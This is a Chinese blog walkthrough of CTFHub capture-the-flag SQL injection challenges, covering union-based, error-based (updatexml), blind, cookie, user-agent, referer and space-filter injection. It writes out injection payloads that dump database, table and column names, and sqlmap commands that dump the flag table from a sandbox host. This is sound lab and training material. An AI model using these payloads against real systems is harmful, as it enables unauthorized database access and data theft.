CTFHUB之sql注入(特详解)

最新推荐文章于 2024-04-18 21:36:30 发布
最新推荐文章于 2024-04-18 21:36:30 发布
阅读量2.6k 收藏 23
点赞数 3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xhy18634297976/article/details/117967717
版权

CTFHUB之sql注入

1.整数型注入

1.这里我使用的是Hackbar来进行sql注入,首先先判断有没有注入漏洞

加单引号

在这里插入图片描述

去掉‘加上and 1=1发现出现了回显

在这里插入图片描述

将1=1变为1=2,语句正确但是无法访问数据库

在这里插入图片描述

这里可以判定这里存在数字注入漏洞

2.接下来判断字段数量

这里输入id=1 order by 2看是否字段数量是否是2个

在这里插入图片描述

3.查询SQL语句插入位置

这里使用联合查询,查询库名。可以在data库中插入sql语句,也就是2的位置

在这里插入图片描述

4.获取数据库库名

1)获取当前数据库库名,数据库的名称为sqli

在这里插入图片描述

2)获取所有数据库的库名

这里输入union select 1,group_concat(schema_name)from information_schema.schemata

在这里插入图片描述

3)逐条获取数据库库名

select schema_name from information_schema.schemata limit 0,1;

修改limit中第一个数字获取其他的数据库名,如获取第二个库名:limit 1,1。

5.获取数据库表名

一次性获取当前数据库所有的表名

union select 1,group_concat(table_name) from information_schema.table where table_schema=‘sqli’

在这里插入图片描述

6.这时候已经发现flag只需要把这个字段得出即可,把flag里的所有的字段得出

union select 1,group_concat(column_name) from information_schema.columns where table_schema=‘sqli’ and table_name=‘flag’

在这里插入图片描述

7.获取数据

一次性获取所有数据

union select 1,group_concat(flag) from sqli.flag

在这里插入图片描述

2.字符型注入

这里使用sqlmap来进行查库

1.sqlmap爆当前数据库信息

python sqlmap.py -u “http://challenge-fe965eeefb82914d.sandbox.ctfhub.com:10080/?id=1” --current-db

在这里插入图片描述

数据库名称为sqli

2.sqlmap列出指定数据库所有的表名

python sqlmap.py -u “http://challenge-fe965eeefb82914d.sandbox.ctfhub.com:10080/?id=1” -D sqli --tables

在这里插入图片描述

表名为flag,news

3.sqlmap列出指定表名的所有列名

python sqlmap.py -u “http://challenge-fe965eeefb82914d.sandbox.ctfhub.com:10080/?id=1” -D sqli -T flag --columns

在这里插入图片描述

4.sqlmap爆出指定列名字段的值数据

python sqlmap.py -u “http://challenge-fe965eeefb82914d.sandbox.ctfhub.com:10080/?id=1” -D sqli -T flag -C flag --dump

在这里插入图片描述

3.报错注入

1.查询当前使用的数据库

-1 union select updatexml(1, concat(0x7e, database(),0x7e),1)

在这里插入图片描述

2.查询数据库表名

-1 union select updatexml(1, concat(0x7e,( select( group_concat( table_name))from information_schema.tables where table_schema=“sqli”),0x7e),1)
在这里插入图片描述

3.获取表的字段名

-1 union select updatexml(1, concat(0x7e,( select( group_concat(column_name))from information_schema.columns where table_schema=‘sqli’ and table_name=‘flag’),0x7e),1)
在这里插入图片描述

4.获取指定数据库的表的列的内容(得到flag)

在这里插入图片描述

4.布尔盲注

这里使用上面的sqlmap方法,这是这里使用的是布尔盲注

在这里插入图片描述

5.时间盲注

这里的办法和上面的一样。

在这里插入图片描述

MYSQL结构

1.输入1发现两个输入点,验证这两个输入点

在这里插入图片描述

2.获取数据库名称

在这里插入图片描述

3.得到数据库中的表的名称
在这里插入图片描述

4.查询jvqhzntymw的字段名称

在这里插入图片描述

5.查询对应字段的值得到flag

在这里插入图片描述

在这里插入图片描述

COOKIE注入

1.判断注入点

在这里插入图片描述

2.爆当前数据库信息

在这里插入图片描述

3.列出指定数据库所有的表名 vjfntvadvv

在这里插入图片描述

4.列出指定表名的所有列名

在这里插入图片描述

5.查询对应字段的值,得到flag

在这里插入图片描述

UA注入

1.抓包分析,注入点在请求头中

在这里插入图片描述

2.查看所有的数据库

在这里插入图片描述

3.查询所有表

在这里插入图片描述

4.查询所有的字段,查询flag

在这里插入图片描述

Refer注入

1.先进行抓包处理,这里没有referer在bp中加入

在这里插入图片描述

2.查库

在这里插入图片描述

查表

在这里插入图片描述

查字段

在这里插入图片描述

找到flag

在这里插入图片描述

过滤空格

1.先输入id=1 order by 2

在这里插入图片描述

2.这里使用hackbar进行注入。这里用/**/来代替空格

先进行查库

在这里插入图片描述

3.查表

在这里插入图片描述

4.查字段找到flag

在这里插入图片描述

小宇特详解
关注
  • 3
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Ctfhub解题 web SQL注入(全部完整版)
weixin_46703850的博客
03-15 5085
Ctfhub解题 web SQL注入
CTFHub SQL注入
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-09 1077
ctfhubSQL注入中的flag是动态生成的 1、整数型注入 1、按照提示输入1 发现直接给出了SQL语句,根据给出的SQL语句可以判断出直接使用联合查询即可 2、先使用order by判断字段数 首先使用order by 3 ,页面无回显,改为2之后页面显示正确。因此判断当前数据库当前表,共有2个字段。 3、使用联合查询,判断页面显示位 首先将id改为一个不存在的纸,根据联合查询的性,就会返回11111,222222然后显示在页面上。 4、查询数据库版本 5、查询当前数据库 6、查询所有数
pangolinsdl—sql注入工具
06-20
pangolinsdl—sql注入工具 很好用的sql注入工具 界面简洁好用 使用方便
SQL注入之基于布尔的盲注详解
09-10
首先说明的盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间的盲注。这篇文章主要讲解的是基于布尔的盲注。下面来一起看看吧。
CTFHub(web SQL注入
最新发布
2301_81105268的博客
04-18 1079
id=1这个语句在数据库中返回几列,也就是SELECT * FROM uers WHERE id=1 and 1=2 LIMIT 1,0这个语句的数据结果集有几列,然后才可以用union进行联合查询。(2)可以用concat()或concat_ws()或group_concat()—[见数据库连接语句]----使得在sql注入时快速获得数据库的相关信息。使用order by语句进行测试:1 order by 1、1 order by 2等,直到报错为止,报错的前一个数,为字段数。
CTFHub技能树 Web-SQL注入详解
千寻的博客
11-21 1956
所谓SQL注入就是用户在能够控制SQL查询、更新、插入、删除等语句的参数的情况下,攻击者通过构造殊的输入字符串使后端程序错误地识别SQL查询语句中的代码与数据部分从而导致数据库管理系统输出了非预期的结果的一种行为。
CTFHUB|SQL注入sqlmap)
m0_60651303的博客
07-14 1172
差不多学了4天的SQL手工注入,学习一下sqlmap的使用,用工具偷偷懒。但等级越高,其速度越慢。一定要在时间内跑出来,要不然过期了就跑不出来了。1、顾名思义,要拿到cookie值。2、需要设置level至少为2。UA注入用--level 3。2、找数据库里面的表。4、爆破列里面的内容。过程中都会有五个选择。
SQL学习(CTFhub)整数型注入,字符型注入,报错注入 -----手工注入+ sqlmap注入
qq_73861475的博客
11-13 533
1 order by 1,接着尝试爆1 order by 2, 1 order by 3,结果到1 order by 3出现报错,由此可以判断,表格中有两个字段。id=1 -D (数据库名) -T (输入需要查询的表名) -C (表内的字段名) --dump。id=1 -D (数据库名) -T (输入需要查询的表名) --columns。-1' union select 1,database() #(这里的-1和整数型注入的情况一样)那就输入1' ,发现报错没有回显,接着输入1' and 1=1。
sql注入之手工注入示例详解
09-10
之前和大家分享了基本的SQL注入的知识,这一篇讲的就是在得知注入点的之后,如何有效地进行脱裤。文章通过示例介绍的很详细,对大家的理解和学习很有帮助,下面来一起看看吧。
sql注入之新手入门示例详解
09-10
SQL注入是一种常见的网络安全威胁,它发生在应用程序接收用户输入并直接构造SQL查询时,如果没有正确地过滤或转义这些输入,攻击者就能插入恶意的SQL语句,从而获取、修改、删除数据库中的敏感信息,甚至完全控制...
SQL注入思路详解
12-14
一、SQL注入可以分为三个步骤 1.识别Web应用与数据库交互的可能输入(识别潜在注入点) 2.SQL注入语句测试 3.根据服务器返回判定注入语句是否影响了SQL执行结果以判断是否存在SQL注入     2.识别Web应用与数据库...
mysql中GROUP_CONCAT的使用方法实例分析
12-14
本文实例讲述了mysql中GROUP_CONCAT的使用方法。分享给大家供大家参考,具体如下: 现在有三个表,结构如下: cate表: CREATE TABLE `cate` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'id', `name` char(20) DEFAULT '' COMMENT '分类名', PRIMARY KEY (`id`) ) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8 COMMENT='\u6587\u7ae0\u5206\u7c7b\u8868'; article表: CRE
DVWA之SQL注入详解(包含知识点)
10-20
该文档是使用DVWA平台进行的SQL注入(low)级别的详细操作和知识点分析,包括什么是SQL注入,如何进行SQL注入,图文并茂,包含了几个非常不错的操作,解决了各种问题。
MYSQL利用Navicat对含有Bold字段表进行导入导出
热门推荐
林海潜的博客专栏
06-27 1万+
MYSQL中含有Blob字段是一件挺麻烦的事情,导出导入不方便。我介绍我是怎么做的。 1、在MYSQL的my.ini最后中添加一行配置max_allowed_packet = 100M,重启MYSQL服务 根据实际情况来定这个数值的大小,我这次表里面有82个mediumblob字段,所以设置为100M 2、用XML格式导出数据 3、选择用XML导入数据
ctfhub-sql注入
qq_45751902的博客
04-07 1850
整数型注入 行数 1 order by 2 数据库名 -1 union select 1,database() -- 一开始我在后面加上+,但是这个+是在url才可以被当作空格,有点傻了 表名 -1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli' -- 字段 -1 union select 1,group_concat(column_name) fro
CTFHub | web—SQL注入(字符型注入
2301_76435948的博客
09-26 246
如果满足以上三点,可以判断该url为字符型注入。服务端的sql语句为:select 列 from 数据库.表 where name=‘$name’
SQL注入之MYSQL注入
av11566的博客
04-19 7076
前言 MYSQL注入中首先要明确当前注入点权限,高权限注入时有更多的攻击手法,有的能直接进行getshell操作。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。不论作为攻击还是防御都需要了解其中的手法和原理,这样才是一个合格的安全工作者。 必要知识 在MYSQL5.0以上版本中,MYSQL存在一个自带数据库名为information_schema,它是一个存储记录有所有数据库名,表名,列名的数据库,也相当于可以通过查询它获取指定数据库下面的表名或者列名信息。 数据库中符号"
SQL注入中group_concat的学习笔记
kofi的博客,已停更
04-07 1372
<link rel="stylesheet" href="https://csdnimg.cn/release/blogv2/dist/mdeditor/css/editerView/ck_htmledit_views-b5506197d8.css"> <div id="content_views" class="markdown_views prism-atom-one-dark"> <svg xmlns="ht...
CTFHub SQL注入 整数型注入
weixin_44732566的博客
02-12 3734
CTFHub SQL注入 整数型注入 强烈推荐这个网站 CTFhub https://www.ctfhub.com/ 分各个类别,题目由易到难 这题还是很基础的,有各种提示 打开是源码,?id=处存在注入 /?id=1 or 1=1 然后就是爆数据库名,information_schema三步 以下是详细步骤: ?id=1 or 1=1 union select 1,database() ...
ctfhub sql注入
10-09
CTFHub是一个CTF(Capture The Flag)竞赛平台,其中包含了各种类型的安全挑战,包括SQL注入SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以利用它来绕过应用程序的身份验证、访问未授权的数据或执行恶意操作。 要进行SQL注入攻击,攻击者需要找到目标应用程序中存在注入漏洞的输入点,并通过构造恶意的SQL语句来利用这些漏洞。以下是一些常见的SQL注入技巧和防御措施: 1. 基于布尔盲注的SQL注入:攻击者通过构造恶意的SQL语句,并根据应用程序的不同响应来判断注入是否成功。 2. 基于错误的SQL注入:攻击者通过构造恶意的SQL语句,触发应用程序中的错误信息来获取有用的信息。 3. 基于时间延迟的SQL注入:攻击者通过构造恶意的SQL语句,触发应用程序中的时间延迟,从而获取有用的信息。 为了防止SQL注入攻击,开发人员可以采取以下措施: 1. 使用参数化查询或预编译语句来构建和执行SQL查询,而不是直接拼接用户输入到SQL语句中。 2. 对用户输入进行严格的验证和过滤,确保只接受预期的输入,并对输入进行适当的转义或编码。 3. 最小化应用程序的权限,限制数据库用户的权限,并使用最小化的权来执行数据库查询。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小宇特详解

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值